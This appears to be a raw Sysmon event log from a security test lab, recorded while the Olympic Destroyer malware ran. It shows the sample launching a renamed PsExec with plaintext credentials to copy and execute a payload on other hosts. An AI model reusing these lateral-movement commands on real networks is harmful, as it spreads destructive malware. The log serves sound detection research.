10:57:15.822{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-130B-6216-2506-000000003802}6716C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292670Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:15.822{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-130B-6216-2506-000000003802}6716C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292669Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:15.685{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-130B-6216-2406-000000003802}6664C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292668Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:15.685{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292667Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:15.685{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292666Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:15.685{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292665Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:15.685{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292664Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:15.685{C8EA50B7-12E6-6216-4B05-000000003802}67926928C:\Temp\olympic_destroyer.exe{C8EA50B7-130B-6216-2406-000000003802}6664C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292663Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:15.688{C8EA50B7-130B-6216-2406-000000003802}6664C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-12.eu-central-1.compute.internal -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292662Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:15.685{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-130B-6216-2406-000000003802}6664C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000292661Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:15.669{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=3182A945548F6068B4AED165518485B1,SHA256=BEF4D5444DF9FF6CC1D66C7883C98312EB5D88855E2CC6662EB83543B23425A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292660Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:15.522{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30871FFBCC3DB90626A5F9F79719C70E,SHA256=12B10C3CEA9B371F8AF7A19AD7DC1FD163F5389A20DD202B00E61E2F3F231190,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292659Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:15.154{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292658Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:15.154{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217775Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:16.977{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E23D7263D632C38BC1C057E7E58594EA,SHA256=3126B3057BDB7FE3F7FD23460171E01DFEB9B38F331BD8F9374DC9DD73043E97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292694Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:16.869{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC7E14AFF26920943853C99104F8CDE3,SHA256=727811D748797C332ECD0106A2B9370EDC6477AF4ED5BF21DBBACF9AA6186E75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292693Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:16.869{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=AA9280D58CC44922C15E8FC5018D3BE6,SHA256=A66DF2B516DDEA44FFAD7C968031D3E0CBFEBA27920900D75E459D56C685D206,IMPHASH=00000000000000000000000000000000falsetrue 534500x8000000000000000292692Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:16.369{C8EA50B7-130C-6216-2606-000000003802}6620C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 13241300x8000000000000000292691Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:16.338{C8EA50B7-130C-6216-2606-000000003802}6620C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 354300x8000000000000000292690Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:14.512{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53730-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000292689Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:16.269{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-130C-6216-2706-000000003802}6480C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292688Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:16.269{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-130C-6216-2706-000000003802}6480C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292687Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:16.254{C8EA50B7-130C-6216-2706-000000003802}64806544C:\Windows\system32\conhost.exe{C8EA50B7-130C-6216-2606-000000003802}6620C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292686Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:16.222{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-130C-6216-2706-000000003802}6480C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292685Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:16.219{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-130C-6216-2706-000000003802}6480C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292684Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:16.122{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292683Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:16.122{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292682Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:16.122{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292681Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:16.122{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292680Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:16.069{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-130C-6216-2606-000000003802}6620C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292679Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:16.069{C8EA50B7-12E6-6216-4B05-000000003802}67926928C:\Temp\olympic_destroyer.exe{C8EA50B7-130C-6216-2606-000000003802}6620C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292678Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:16.077{C8EA50B7-130C-6216-2606-000000003802}6620C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.12 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292677Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:16.069{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-130C-6216-2606-000000003802}6620C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000292676Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:16.069{C8EA50B7-130B-6216-2406-000000003802}6664C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 13241300x8000000000000000292675Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:16.038{C8EA50B7-130B-6216-2406-000000003802}6664C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 13241300x8000000000000000292747Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:17.737{C8EA50B7-130D-6216-2C06-000000003802}7072C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292746Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 